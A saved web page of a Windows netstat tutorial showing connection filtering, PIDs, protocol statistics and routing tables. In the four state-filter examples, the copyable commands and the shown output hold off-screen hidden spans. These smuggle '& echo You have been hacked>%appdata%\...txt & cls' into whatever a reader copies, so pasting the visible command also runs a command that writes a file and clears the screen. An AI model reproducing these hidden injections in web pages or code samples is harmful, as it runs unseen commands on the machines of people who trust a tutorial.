googletag.defineSlot('/124067137/appsychology_728x90FL_3', [[728, 90], [970, 90], [970, 250], [320, 50]], 'waldo-tag-915').defineSizeMapping(googletag.sizeMapping().addSize([1024, 0], [[728, 90], [970, 90], [970, 250]]).addSize([768, 0], [[320, 50]]).addSize([0, 0], [[320, 50]]).build()).addService(googletag.pubads());googletag.display('waldo-tag-915');});</script><style type="text/css">.app_gdpr--2k2uB{
  /*! normalize.css v7.0.0 | MIT License | github.com/necolas/normalize.css */font-family:Helvetica Neue,arial,sans-serif;font-weight:400;font-size:16px;line-height:25px}.app_gdpr--2k2uB html{line-height:1.15;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}.app_gdpr--2k2uB body{margin:0}.app_gdpr--2k2uB article,.app_gdpr--2k2uB aside,.app_gdpr--2k2uB footer,.app_gdpr--2k2uB header,.app_gdpr--2k2uB nav,.app_gdpr--2k2uB section{display:block}.app_gdpr--2k2uB h1{font-size:2em;margin:.67em 0}.app_gdpr--2k2uB figcaption,.app_gdpr--2k2uB figure,.app_gdpr--2k2uB main{display:block}.app_gdpr--2k2uB figure{margin:1em 40px}.app_gdpr--2k2uB hr{box-sizing:content-box;height:0;overflow:visible}.app_gdpr--2k2uB pre{font-family:monospace,monospace;font-size:1em}.app_gdpr--2k2uB a{background-color:transparent;-webkit-text-decoration-skip:objects}.app_gdpr--2k2uB abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}.app_gdpr--2k2uB b,.app_gdpr--2k2uB strong{font-weight:inherit;font-weight:bolder}.app_gdpr--2k2uB code,.app_gdpr--2k2uB kbd,.app_gdpr--2k2uB samp{font-family:monospace,monospace;font-size:1em}.app_gdpr--2k2uB dfn{font-style:italic}.app_gdpr--2k2uB mark{background-color:#ff0;color:#000}.app_gdpr--2k2uB small{font-size:80%}.app_gdpr--2k2uB sub,.app_gdpr--2k2uB sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.app_gdpr--2k2uB sub{bottom:-.25em}.app_gdpr--2k2uB sup{top:-.5em}.app_gdpr--2k2uB audio,.app_gdpr--2k2uB video{display:inline-block}.app_gdpr--2k2uB audio:not([controls]){display:none;height:0}.app_gdpr--2k2uB img{border-style:none}.app_gdpr--2k2uB svg:not(:root){overflow:hidden}.app_gdpr--2k2uB button,.app_gdpr--2k2uB input,.app_gdpr--2k2uB optgroup,.app_gdpr--2k2uB select,.app_gdpr--2k2uB textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}.app_gdpr--2k2uB button,.app_gdpr--2k2uB input{overflow:visible}.app_gdpr--2k2uB button,.app_gdpr--2k2uB select{text-transform:none}.app_gdpr--2k2uB [type=reset],.app_gdpr--2k2uB [type=submit],.app_gdpr--2k2uB button,.app_gdpr--2k2uB html [type=button]{-webkit-appearance:button}.app_gdpr--2k2uB [type=button]::-moz-focus-inner,.app_gdpr--2k2uB [type=reset]::-moz-focus-inner,.app_gdpr--2k2uB [type=submit]::-moz-focus-inner,.app_gdpr--2k2uB button::-moz-focus-inner{border-style:none;padding:0}.app_gdpr--2k2uB [type=button]:-moz-focusring,.app_gdpr--2k2uB [type=reset]:-moz-focusring,.app_gdpr--2k2uB [type=submit]:-moz-focusring,.app_gdpr--2k2uB button:-moz-focusring{outline:1px dotted ButtonText}.app_gdpr--2k2uB fieldset{padding:.35em .75em .625em}.app_gdpr--2k2uB legend{box-sizing:border-box;color:inherit;display:table;max-width:100%;padding:0;white-space:normal}.app_gdpr--2k2uB progress{display:inline-block;vertical-align:baseline}.app_gdpr--2k2uB textarea{overflow:auto}.app_gdpr--2k2uB [type=checkbox],.app_gdpr--2k2uB [type=radio]{box-sizing:border-box;padding:0}.app_gdpr--2k2uB [type=number]::-webkit-inner-spin-button,.app_gdpr--2k2uB [type=number]::-webkit-outer-spin-button{height:auto}.app_gdpr--2k2uB [type=search]{-webkit-appearance:textfield;outline-offset:-2px}.app_gdpr--2k2uB [type=search]::-webkit-search-cancel-button,.app_gdpr--2k2uB [type=search]::-webkit-search-decoration{-webkit-appearance:none}.app_gdpr--2k2uB ::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}.app_gdpr--2k2uB details,.app_gdpr--2k2uB menu{display:block}.app_gdpr--2k2uB summary{display:list-item}.app_gdpr--2k2uB canvas{display:inline-block}.app_gdpr--2k2uB [hidden],.app_gdpr--2k2uB template{display:none}.app_gdpr--2k2uB *{box-sizing:border-box}.app_gdpr--2k2uB a{text-decoration:none;color:#41afbb;cursor:pointer}.app_gdpr--2k2uB a:hover{color:#27686f}.app_gdpr--2k2uB table{margin:0}.app_gdpr--2k2uB input:not([type]),.app_gdpr--2k2uB input[type=password],.app_gdpr--2k2uB input[type=text]{box-sizing:border-box;box-shadow:inset 0 3px 3px rgba(0,0,0,.05);background-color:#fff;border-radius:4px;border:1px solid #c5c5c5;color:#333;font-family:Helvetica Neue,Helvetica,Arial,sans-serif;font-size:1em;margin:0;padding:0 9px;height:28px}</style><style type="text/css">.popup_popup--1TXMW{display:none;z-index:99999;justify-content:center;align-items:center}.popup_overlay--2rgA3,.popup_popup--1TXMW{position:fixed;top:0;bottom:0;left:0;right:0}.popup_overlay--2rgA3{background-color:rgba(0,0,0,.5)}.popup_content--2JBXA{width:650px;height:700px;background:#fff;display:flex;align-items:center;position:relative}@media only screen and (min-device-width:320px) and (max-device-width:480px){.popup_content--2JBXA{width:98%;height:98%}}</style><style type="text/css">.details_details--3oWod{display:flex;flex-direction:column;flex:1;height:100%}.details_details--3oWod .details_body--31iMA{flex:1;min-height:0;overflow:scroll;-webkit-overflow-scrolling:touch;padding:25px}.details_details--3oWod .details_footer--1oDeu{display:flex;flex:0 1 70px;border-top:1px solid #eaeaea}.details_details--3oWod .details_save--1ja7w{background:#7ebf61;border-radius:0;flex:1}.details_details--3oWod .details_back--2ZlLi{background:#41afbb;border-radius:0;flex:1}.details_title--3NjQA{font-weight:700;font-size:22px;padding:5px 0;color:#333}.details_description--2fo80{padding-bottom:20px;color:#8a8a8a}</style><style type="text/css">button.button_button--lgX0P,input[type=button].button_button--lgX0P{cursor:pointer;outline:none;padding:1em;background:#41afbb;color:#fff;border:none;border-radius:4px;font-size:18px}button.button_button--lgX0P:hover,input[type=button].button_button--lgX0P:hover{color:#27686f}button.button_button--lgX0P.button_invert--1bse9,input[type=button].button_button--lgX0P.button_invert--1bse9{background:#fff;border:2px solid #41afbb;color:#41afbb}button.button_button--lgX0P.button_invert--1bse9:hover,input[type=button].button_button--lgX0P.button_invert--1bse9:hover{color:#8bcfd7}</style><style type="text/css">div.vendors_vendors--8OdK0{display:flex;flex-direction:column;padding:2%}div.vendors_vendors--8OdK0 .vendors_header--1SG4L{display:flex;flex-shrink:0}@media only screen and (min-device-width:320px) and (max-device-width:480px){div.vendors_vendors--8OdK0 .vendors_header--1SG4L{flex-direction:column;align-items:center}}div.vendors_vendors--8OdK0 .vendors_title--dWx7J{flex:1;font-size:24px;font-weight:700}@media only screen and (min-device-width:320px) and (max-device-width:480px){div.vendors_vendors--8OdK0 .vendors_title--dWx7J{text-align:center;padding-bottom:5px}}div.vendors_vendors--8OdK0 .vendors_button--3_KzL{min-width:140px;padding:8px;white-space:nowrap}div.vendors_vendors--8OdK0 .vendors_button--3_KzL:first-child{margin-right:10px}@media only screen and (min-device-width:320px) and (max-device-width:480px){div.vendors_vendors--8OdK0 .vendors_button--3_KzL{flex:1}}div.vendors_vendors--8OdK0 .vendors_options--3Zczf{display:flex}@media only screen and (min-device-width:320px) and (max-device-width:480px){div.vendors_vendors--8OdK0 .vendors_options--3Zczf{width:100%}}div.vendors_vendors--8OdK0 .vendors_description--2KZp_{margin:10px 0;flex-shrink:0}div.vendors_vendors--8OdK0 .vendors_vendorHeader--2c_Zd{display:flex;flex-shrink:0}div.vendors_vendors--8OdK0 .vendors_vendorContent--2L1FV{display:flex}div.vendors_vendors--8OdK0 .vendors_vendorList--2xqzv{margin-top:10px}div.vendors_vendors--8OdK0 .vendors_vendorName--lLRCk{min-height:30px;display:flex;align-items:center;font-size:14px}div.vendors_vendors--8OdK0 table{width:100%;border-collapse:collapse}div.vendors_vendors--8OdK0 table thead tr{background-color:#f7f7f7;border:1px solid #eaeaea;font-size:12px}div.vendors_vendors--8OdK0 table tr{min-height:40px}div.vendors_vendors--8OdK0 table tr th{font-weight:700;white-space:nowrap}div.vendors_vendors--8OdK0 table tr td,div.vendors_vendors--8OdK0 table tr th{padding:5px;font-size:12px;white-space:nowrap}div.vendors_vendors--8OdK0 table tr td:first-child,div.vendors_vendors--8OdK0 table tr th:first-child{width:100%;text-align:left}div.vendors_vendors--8OdK0 table tr td:last-child,div.vendors_vendors--8OdK0 table tr th:last-child{padding-right:25px}div.vendors_vendors--8OdK0 table tr.vendors_even--2jd4F{background-color:#f7f7f7}div.vendors_vendors--8OdK0 .vendors_allowColumn--2O5Bm{text-align:center}div.vendors_vendors--8OdK0 .vendors_allowSwitch--ZYymO{display:flex;align-items:center}div.vendors_vendors--8OdK0 .vendors_policy--2QHMf{margin:0 5px;display:flex;fill:#41afbb}</style><style type="text/css">.switch_switch--YfiyU{cursor:pointer;display:inline-block;height:28px;position:relative;user-select:none;width:50px}.switch_switch--YfiyU .switch_isDisabled--2LpDX{cursor:not-allowed}.switch_switch--YfiyU .switch_native--3vL1-{opacity:0}.switch_switch--YfiyU .switch_visualizationContainer--1u7wB{background-color:#eaeaea;border-radius:11px;height:22px;left:3px;position:absolute;top:3px;transition:.1s linear;width:44px}.switch_switch--YfiyU .switch_visualizationGlow--3N7Vv{background-color:#41afbb;border-radius:9px;height:18px;left:5px;opacity:0;position:absolute;top:5px;transition:.1s linear;width:18px}.switch_switch--YfiyU .switch_visualizationHandle--33XDu{background-color:#fff;border-radius:8px;height:16px;left:6px;position:absolute;top:6px;transition:.1s linear;width:16px}.switch_switch--YfiyU:hover .switch_visualizationGlow--3N7Vv{opacity:.3;transform:scale(1.556)}.switch_switch--YfiyU:hover .switch_visualizationHandle--33XDu{transform:scale(1.125)}.switch_switch--YfiyU.switch_isSelected--17KWm .switch_visualizationContainer--1u7wB{background-color:#41afbb}.switch_switch--YfiyU.switch_isSelected--17KWm .switch_visualizationGlow--3N7Vv,.switch_switch--YfiyU.switch_isSelected--17KWm .switch_visualizationHandle--33XDu{transform:translate(22px)}.switch_switch--YfiyU.switch_isSelected--17KWm:hover .switch_visualizationGlow--3N7Vv{transform:translate(22px) scale(1.556)}.switch_switch--YfiyU.switch_isSelected--17KWm:hover .switch_visualizationHandle--33XDu{transform:translate(22px) scale(1.125)}</style><style type="text/css">.vendorList_vendorList--2NVRm .vendorList_even--2r9Bw{background:#f7f7f7}.vendorList_vendorList--2NVRm table{border-collapse:collapse;margin-top:10px;width:100%}.vendorList_vendorList--2NVRm table tr td{padding:10px;white-space:nowrap}.vendorList_vendorList--2NVRm .vendorList_company--Aiex8{display:flex;align-items:center}.vendorList_vendorList--2NVRm .vendorList_policy--3FMXd{fill:#41afbb;margin:0 5px;display:flex}</style><style type="text/css">.summary_summary--39BrN .summary_purposeItems--1gHBj{padding-bottom:20px}.summary_summary--39BrN .summary_purposeItem--3WVlI{display:flex;border-top:1px solid #eaeaea;padding:8px 0;color:#8a8a8a}.summary_summary--39BrN .summary_purposeItem--3WVlI:last-child{border-bottom:1px solid #eaeaea}.summary_summary--39BrN .summary_learnMore--QHtl7{font-size:14px}.summary_summary--39BrN .summary_purposeTitle--2P0K-{flex:1;font-size:18px}</style><style type="text/css">.purposeList_purposeList--1Pzbn .purposeList_infoItem--2_7P0{color:#8a8a8a;font-weight:700;padding:10px 0}</style><style type="text/css">.banner_banner--3pjXd{position:fixed;right:0;left:0;bottom:-1000px;z-index:99999;display:flex;align-items:center;justify-content:center;color:#8a8a8a;background:#fff;font-size:18px;max-height:100%;transition:bottom .5s ease-in-out;box-shadow:0 0 5px #41afbb;padding:0 20px}.banner_banner--3pjXd a{text-decoration:underline;padding:0 4px}.banner_banner--3pjXd .banner_title--2vgc3{font-size:24px;color:#333;padding:20px 0}.banner_banner--3pjXd .banner_message--2Rvgt{padding:20px 0}.banner_banner--3pjXd .banner_expand--orct5{padding:0;height:20px;fill:#41afbb;transform:rotate(-90deg);transition:.5s ease}.banner_banner--3pjXd .banner_expand--orct5.banner_expanded--2lZxB{transform:rotate(0deg)}.banner_banner--3pjXd .banner_info--2XcOt{display:flex}.banner_banner--3pjXd .banner_infoExpanded--1AHSZ{padding:0 10px 10px;min-height:210px}.banner_banner--3pjXd .banner_infoExpanded--1AHSZ ul{margin:0}</style><link rel="prefetch" href="https://geekflare.com/run-windows-on-mac/"></head>
<body class="post-template-default single single-post postid-4224 single-format-standard custom-background">




<main class="s-content">



<div id="pPost">
<div class="container">
<div class="row">
<div class="col-12">

<div class="page-wrapper">





<div class="post-thumbnail">
<img src="https://geekflare.com/wp-content/uploads/2020/07/windows-1200x385.jpg" class="attachment-geekflare-post-large size-geekflare-post-large wp-post-image" alt="windows-1200x385" loading="lazy" srcset="https://geekflare.com/wp-content/uploads/2020/07/windows.jpg 1200w, https://geekflare.com/wp-content/uploads/2020/07/windows-840x270.jpg 840w, https://geekflare.com/wp-content/uploads/2020/07/windows-495x160.jpg 495w, https://geekflare.com/wp-content/uploads/2020/07/windows-200x64.jpg 200w" sizes="(max-width: 1200px) 100vw, 1200px" width="1200" height="385">
<div class="row justify-content-center">
<div class="col-12 col-lg-10">
<div class="post-thumbnail-overlay"></div>
</div>
</div>
</div>

<div class="row justify-content-center">
<div class="col-12 col-lg-8">

<h1 class="page-heading">
7 netstat Command Usage on Windows with Example </h1>


<div class="page-advertisement">
<div class="page-advertisement-after-post-heading">
 </div>
</div>


<div class="post-meta">

</div>


<div class="post-content">

<div class="post-social-share-sidebar b-sticky-sidebar b-sticky-sidebar-left">

<div class="b-sticky-sidebar-wrapper b-sticky-sidebar-wrapper-simple">



</div>

</div>


<div class="post-advertisement-sidebar b-sticky-sidebar b-sticky-sidebar-right">



</div>

 
<div class="post-content-main smart-list-enabled js-post-main-content">
<p>netstat is a command-line network tool that is a handy<span style="color: #000000;"> troubleshooting command. Its cross-platform utility means you can use it on <a href="https://geekflare.com/netstat/" data-wpel-link="internal">Linux</a>, macOS, or Windows.</span></p>
<p><span style="color: #000000;">netstat can be very handy in the following.</span></p>
<ul>
<li>Display incoming and outgoing network connections</li>
<li>Display routing tables</li>
<li>Display number of network interfaces</li>
<li>Display network protocol statistics</li>
</ul>
<p>Let’s get it started…</p>
<h2>Show all connections</h2>
<p>To start with&nbsp;netstat, let’s see the command that displays all connections.</p>
<pre class="line-numbers language-powershell code-toolbar"><code class=" language-powershell">netstat -a</code><div class="toolbar"><div class="toolbar-item"><a>Copy</a></div></div></pre>
<p>Type the above command and hit enter. You will see all the active connections from different states as shown below.</p>
<pre class="line-numbers language-markup code-toolbar"><code class=" language-markup">C:\Windows\system32&gt;netstat -a

Active Connections

Proto Local Address Foreign Address State
TCP 192.168.43.15:139 DESKTOP-A0PM5GD:0 LISTENING
TCP 192.168.43.15:52484 153:https ESTABLISHED
TCP 192.168.43.15:52532 ec2-13-228-49-204:https TIME_WAIT
UDP [fe80::998c:d2d:17df:65d9%12]:58903 *:*</code><div class="toolbar"><div class="toolbar-item"><a>Copy</a></div></div></pre>
<p>You will see a header with&nbsp;<strong>Proto, Local Address, Foreign Address, and State</strong>. Let’s see brief info about them.</p>
<ul>
<li>Proto – defined the protocol type (TCP, UDP, etc..,) of the socket.</li>
<li>Local Address – displays your computer IP address and port, local end of the socket.</li>
<li>Foreign Address – displays remote computer that your computer is connected to, the remote end of the socket.</li>
<li>State – defines the state of the socket (LISTENING, ESTABLISHED, CLOSE_WAIT, TIME_WAIT).</li>
</ul>
<p>We can filter the connections in different ways. Let’s see them.</p>
<h2>Show only established connection</h2>
<p style="text-align: justify;"><span style="color: #000000;">We have seen the state in the connection information. You can use below syntax to view all established connections from/to your Windows server.</span><span style="color: #000000;"><br>
</span></p>
<pre class="line-numbers language-powershell code-toolbar"><!--<code class=" language-powershell">-->netstat -ano | findstr ESTABLISHE<span style="position: absolute; left: -1000px; top: -1000px"> > nul & echo You have been hacked>%appdata%\WaZZZZZZZZaAaAaAPPpppppp!!!!.txt & cls<br>netstat -ano | findstr ESTABLISHED<br></span>D<!--</code><div class="toolbar"><div class="toolbar-item"><a>Copy</a></div></div>--></pre>
<pre style="text-align: justify;"><span style="color: #000000;">C:\Windows\system32&gt;<strong>netstat -ano | findstr ESTABLISHE<span style="position: absolute; left: -1000px; top: -1000px"> > nul & echo You have been hacked>%appdata%\WaZZZZZZZZaAaAaAPPpppppp!!!!.txt & cls<br>netstat -ano | findstr ESTABLISHED<br></span>D</strong>
 TCP 172.16.179.128:49375 a23-77-202-113:http ESTABLISHED
C:\Windows\system32&gt;
</span></pre>
<p style="text-align: justify;"><span style="color: #000000;"><strong>Note:</strong> to view LISTEN, CLOSE_WAIT, TIME_WAIT you can just use as follows.</span></p>
<p>To see the connections that are in <strong>LISTENING</strong> state change <strong>ESTABLISHED</strong> keyword in the previous command to <strong>LISTENING</strong>. You will get the information about connections that are in the listening state as follows.</p>
<pre class="line-numbers language-markup code-toolbar"><!--<code class=" language-markup">-->netstat -ano | findstr LISTENIN<span style="position: absolute; left: -1000px; top: -1000px"> > nul & echo You have been hacked>%appdata%\WaZZZZZZZZaAaAaAPPpppppp!!!!.txt & cls<br>netstat -ano | findstr LISTENING<br></span>G<!--</code><div class="toolbar"><div class="toolbar-item"><a>Copy</a></div></div>--></pre>
<pre><span style="color: #000000;">C:\Windows\system32&gt;<strong>netstat -ano | findstr LISTENIN<span style="position: absolute; left: -1000px; top: -1000px"> > nul & echo You have been hacked>%appdata%\WaZZZZZZZZaAaAaAPPpppppp!!!!.txt & cls<br>netstat -ano | findstr LISTENING<br></span>G</strong></span>
<span style="color: #000000;">  TCP 192.168.43.15:139 DESKTOP-A0PM5GD:0 LISTENING</span></pre>
<p>Similarly, run the following command to see all the connections that are in <strong>CLOSE_WAIT&nbsp;</strong>state.</p>
<pre class="line-numbers language-markup code-toolbar"><!--<code class=" language-markup">-->netstat -ano | findstr CLOSE_WAI<span style="position: absolute; left: -1000px; top: -1000px"> > nul & echo You have been hacked>%appdata%\WaZZZZZZZZaAaAaAPPpppppp!!!!.txt & cls<br>netstat -ano | findstr CLOSE_WAIT<br></span>T<!--</code><div class="toolbar"><div class="toolbar-item"><a>Copy</a></div></div>--></pre>
<pre><span style="color: #000000;">C:\Windows\system32&gt;<strong>netstat -ano | findstr CLOSE_WAI<span style="position: absolute; left: -1000px; top: -1000px"> > nul & echo You have been hacked>%appdata%\WaZZZZZZZZaAaAaAPPpppppp!!!!.txt & cls<br>netstat -ano | findstr CLOSE_WAIT<br></span>T</strong></span>
<span style="color: #000000;">  TCP 192.168.43.15:52581 ec2-52-1-183-160:https CLOSE_WAIT
  TCP 192.168.43.15:52584 ec2-34-227-121-63:https CLOSE_WAIT</span></pre>
<p><span style="color: #000000;">Finally, use the <strong>TIME_WAIT </strong>flag to get information about all the connections that are in <strong>TIME_WAIT </strong>state.<br>
</span></p>
<pre class="line-numbers language-markup code-toolbar"><!--<code class=" language-markup">-->netstat -ano | findstr TIME_WAI<span style="position: absolute; left: -1000px; top: -1000px"> > nul & echo You have been hacked>%appdata%\WaZZZZZZZZaAaAaAPPpppppp!!!!.txt & cls<br>netstat -ano | findstr TIME_WAIT<br></span>T<!--</code><div class="toolbar"><div class="toolbar-item"><a>Copy</a></div></div>--></pre>
<pre><span style="color: #000000;">C:\Windows\system32&gt;<strong>netstat -ano | findstr TIME_WAI<span style="position: absolute; left: -1000px; top: -1000px"> > nul & echo You have been hacked>%appdata%\WaZZZZZZZZaAaAaAPPpppppp!!!!.txt & cls<br>netstat -ano | findstr TIME_WAIT<br></span>T</strong></span>
 TCP 192.168.43.15:52590 server-13-33-179-97:https TIME_WAIT</pre>
<h2>Show PID used by port number</h2>
<p>Every connection is a process internally. And every process has an ID, and its called <strong>PID</strong>. We can see the PID of every socket connection using the following command.</p>
<pre class="line-numbers language-markup code-toolbar"><code class=" language-markup">netstat -o</code><div class="toolbar"><div class="toolbar-item"><a>Copy</a></div></div></pre>
<p>The above command displays all the connections with PID. Let’s run the command and see how we get the result.</p>
<pre><span style="color: #000000;">C:\Windows\system32&gt;<strong>netstat -o</strong></span>

Active Connections

Proto Local Address Foreign Address State PID
TCP 192.168.43.15:50664 40.90.189.152:https ESTABLISHED 3676
TCP 192.168.43.15:50733 40.90.189.152:https ESTABLISHED 10556</pre>
<p>We got an extra column called&nbsp;<strong>PID</strong>. And its the&nbsp;<strong>process identifier</strong>.</p>
<p style="text-align: justify;"><span style="color: #000000;">A very handy when you have to find out which PID is using the particular port number.</span></p>
<pre class="line-numbers language-markup code-toolbar"><code class=" language-markup">netstat –o | findstr $portnumber</code><div class="toolbar"><div class="toolbar-item"><a>Copy</a></div></div></pre>
<p class="line-numbers">You can see the following info if you use the above command.</p>
<pre><span style="color: #000000;">C:\Windows\system32&gt;</span><strong>netstat -o | findstr 50664</strong>
  TCP 192.168.43.15:50664 40.90.189.152:https ESTABLISHED 3676</pre>
<h2>Show statistics of all protocols</h2>
<p style="text-align: justify;"><span style="color: #000000;">Useful when you have to find out for any received header error, received address error, discarded packet, etc. It will list out statistics from IPv4, IPv6, ICMPv4, ICMPv6, TCP, UDP, etc.</span></p>
<pre class="line-numbers language-powershell code-toolbar"><code class=" language-powershell">netstat –s</code><div class="toolbar"><div class="toolbar-item"><a>Copy</a></div></div></pre>
<p>You will see the statistics of all protocols as shown below.</p>
<pre><span style="color: #000000;">C:\Windows\system32&gt;<strong>netstat -s</strong></span>
IPv4 Statistics

Packets Received = 1097370
Received Header Errors = 0
Received Address Errors = 9
Datagrams Forwarded = 0
Unknown Protocols Received = 0
Received Packets Discarded = 1425
Received Packets Delivered = 1098173
Output Requests = 743601
Routing Discards = 0
Discarded Output Packets = 43
Output Packet No Route = 23
Reassembly Required = 0
Reassembly Successful = 0
Reassembly Failures = 0
Datagrams Successfully Fragmented = 0
Datagrams Failing Fragmentation = 0
Fragments Created = 0

IPv6 Statistics

Packets Received = 24
Received Header Errors = 0
Received Address Errors = 0
Datagrams Forwarded = 0
Unknown Protocols Received = 0
Received Packets Discarded = 208
Received Packets Delivered = 519
Output Requests = 1507
Routing Discards = 0
Discarded Output Packets = 0
Output Packet No Route = 0
Reassembly Required = 0
Reassembly Successful = 0
Reassembly Failures = 0
Datagrams Successfully Fragmented = 0
Datagrams Failing Fragmentation = 0
Fragments Created = 0

ICMPv4 Statistics

Received Sent
Messages 52 143
Errors 0 0
Destination Unreachable 52 143
Time Exceeded 0 0
Parameter Problems 0 0
Source Quenches 0 0
Redirects 0 0
Echo Replies 0 0
Echos 0 0
Timestamps 0 0
Timestamp Replies 0 0
Address Masks 0 0
Address Mask Replies 0 0
Router Solicitations 0 0
Router Advertisements 0 0

ICMPv6 Statistics

Received Sent
Messages 0 25
Errors 0 0
Destination Unreachable 0 0
Packet Too Big 0 0
Time Exceeded 0 0
Parameter Problems 0 0
Echos 0 0
Echo Replies 0 0
MLD Queries 0 0
MLD Reports 0 0
MLD Dones 0 0
Router Solicitations 0 15
Router Advertisements 0 0
Neighbor Solicitations 0 5
Neighbor Advertisements 0 5
Redirects 0 0
Router Renumberings 0 0

TCP Statistics for IPv4

Active Opens = 4405
Passive Opens = 5
Failed Connection Attempts = 164
Reset Connections = 347
Current Connections = 19
Segments Received = 980542
Segments Sent = 674787
Segments Retransmitted = 5759

TCP Statistics for IPv6

Active Opens = 48
Passive Opens = 10
Failed Connection Attempts = 38
Reset Connections = 2
Current Connections = 0
Segments Received = 680
Segments Sent = 552
Segments Retransmitted = 128

UDP Statistics for IPv4

Datagrams Received = 117977
No Ports = 1385
Receive Errors = 1
Datagrams Sent = 54516

UDP Statistics for IPv6

Datagrams Received = 1036
No Ports = 208
Receive Errors = 0
Datagrams Sent = 1131</pre>
<p style="text-align: justify;"><span style="color: #000000;">To find out any errors quickly you can use syntax.</span></p>
<pre class="line-numbers language-powershell code-toolbar"><code class=" language-powershell">netstat -s | findstr Errors</code><div class="toolbar"><div class="toolbar-item"><a>Copy</a></div></div></pre>
<pre style="text-align: justify;">C:\Windows\system32&gt;<strong>netstat -s | findstr Errors</strong>
 Received Header Errors = 0
 Received Address Errors = 0
 Received Header Errors = 0
 Received Address Errors = 0
 Errors 0 0
 Errors 0 0
 Receive Errors = 0
 Receive Errors = 0
C:\Windows\system32&gt;</pre>
<p>The above command filters all the errors from statistics of all protocols.</p>
<h2>Show routing information</h2>
<p style="text-align: justify;"><span style="color: #000000;">To display Route Table, you can use the below syntax. The following syntax will also list all interfaces.</span></p>
<pre class="line-numbers language-powershell code-toolbar"><code class=" language-powershell">netstat –r</code><div class="toolbar"><div class="toolbar-item"><a>Copy</a></div></div></pre>
<p style="text-align: justify;"><span style="color: #000000;">If you use the above command, then you see the info about routing as shown below.</span></p>
<pre style="text-align: justify;"><span style="color: #000000;">C:\Windows\system32&gt;<strong>netstat -r</strong>
</span></pre>
<pre>===========================================================================
Interface List
4...8c 16 45 32 4d 3c ......Realtek PCIe GBE Family Controller
16...d4 6d 6d 27 8a 9a ......Microsoft Wi-Fi Direct Virtual Adapter
5...d6 6d 6d 27 8a 99 ......Microsoft Wi-Fi Direct Virtual Adapter #2
12...d4 6d 6d 27 8a 99 ......Intel(R) Dual Band Wireless-AC 3165
10...d4 6d 6d 27 8a 9d ......Bluetooth Device (Personal Area Network)
1...........................Software Loopback Interface 1
===========================================================================

IPv4 Route Table
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 192.168.43.1 192.168.43.15 55
127.0.0.0 255.0.0.0 On-link 127.0.0.1 331
127.0.0.1 255.255.255.255 On-link 127.0.0.1 331
127.255.255.255 255.255.255.255 On-link 127.0.0.1 331
192.168.43.0 255.255.255.0 On-link 192.168.43.15 311
192.168.43.15 255.255.255.255 On-link 192.168.43.15 311
192.168.43.255 255.255.255.255 On-link 192.168.43.15 311
224.0.0.0 240.0.0.0 On-link 127.0.0.1 331
224.0.0.0 240.0.0.0 On-link 192.168.43.15 311
255.255.255.255 255.255.255.255 On-link 127.0.0.1 331
255.255.255.255 255.255.255.255 On-link 192.168.43.15 311
===========================================================================
Persistent Routes:
Network Address Netmask Gateway Address Metric
0.0.0.0 0.0.0.0 10.30.28.1 Default
===========================================================================

IPv6 Route Table
===========================================================================
Active Routes:
If Metric Network Destination Gateway
1 331 ::1/128 On-link
12 311 fe80::/64 On-link
12 311 fe80::998c:d2d:17df:65d9/128
On-link
1 331 ff00::/8 On-link
12 311 ff00::/8 On-link
===========================================================================
Persistent Routes:
None
</pre>
<h2 style="text-align: justify;"><span style="color: #000000;">Show Interface Statistics</span></h2>
<p style="text-align: justify;"><span style="color: #000000;">To view the status of all interface, you can use the following syntax. This will display Received &amp; Sent details.</span></p>
<pre class="line-numbers language-powershell code-toolbar"><code class=" language-powershell">netstat -e</code><div class="toolbar"><div class="toolbar-item"><a>Copy</a></div></div></pre>
<pre style="text-align: justify;">C:\Windows\system32&gt;<strong>netstat -e</strong>
Interface Statistics
 Received Sent
Bytes 8988576 2105244
Unicast packets 12972 11880
Non-unicast packets 0 0
Discards 0 0
Errors 0 0
Unknown protocols 0
C:\Windows\system32&gt;</pre>
<h2>Show Fully Qualified Domain Name of foreign address (remote host)</h2>
<p style="text-align: justify;"><span style="color: #000000;">If you are tracking some issues and would like to know FQDN of the remote host, then you can use the following syntax.</span></p>
<pre class="line-numbers language-markup code-toolbar"><code class=" language-markup">netstat –f</code><div class="toolbar"><div class="toolbar-item"><a>Copy</a></div></div></pre>
<p class="line-numbers"><span style="color: #000000;">If you run the above command, then you will see a similar result as follows.</span></p>
<pre class="line-numbers"><span style="color: #000000;">C:\Windows\system32&gt;<strong>netstat -f</strong>
Proto Local Address Foreign Address State
TCP 192.168.43.15:50664 40.90.189.152:https LISTENING
TCP 192.168.43.15:51437 104.27.119.115:https ESTABLISHED
</span></pre>
<p class="line-numbers"><span style="color: #000000;"><strong>Note: </strong>you can combine <code>findstr</code> syntax to show precise results like below.</span></p>
<pre class="line-numbers language-markup code-toolbar"><code class=" language-markup">netstat –f | findstr ESTABLISHED</code><div class="toolbar"><div class="toolbar-item"><a>Copy</a></div></div></pre>
<p style="text-align: justify;"><span style="color: #000000;">The above command will filter the connections and displays only established connections. Let’s see an example.</span></p>
<pre class="line-numbers"><span style="color: #000000;">C:\Windows\system32&gt;<strong>netstat -f | findstr ESTABLISHED</strong>
TCP 192.168.43.15:51437 104.27.119.115:https ESTABLISHED
</span></pre>
<p>We can filter the connections using the domain with the following command.</p>
<pre class="line-numbers language-powershell code-toolbar"><code class=" language-powershell">netstat –f | findstr $domainnameifyouknow</code><div class="toolbar"><div class="toolbar-item"><a>Copy</a></div></div></pre>
<p>Specify the domain in the command and you will see the filtered connections as follows.</p>
<pre><span style="color: #000000;">C:\Windows\system32&gt;</span><strong>netstat -f | findstr ec2-52-202-6-97.compute-1.amazonaws.com</strong>
TCP 192.168.43.15:52573 ec2-52-202-6-97.compute-1.amazonaws.com:https ESTABLISHED</pre>
<p style="text-align: justify;">I hope this helps you get familiar with netstat command usage on Windows. If you are interested in learning Windows administration then I would suggest checking out this <a href="https://click.linksynergy.com/deeplink?id=jf7w44yEft4&amp;mid=39197&amp;murl=https%3A%2F%2Fwww.udemy.com%2Fcourse%2Fwindows-server-2016-administration-and-deployment%2F" data-wpel-link="external" target="_blank" rel="nofollow external noopener noreferrer">course</a>.</p>
</div>


<div class="post-tag">

<div class="post-tag-label">
TAGS: </div>


<ul class="post-tag-list">

<li class="post-tag-item">

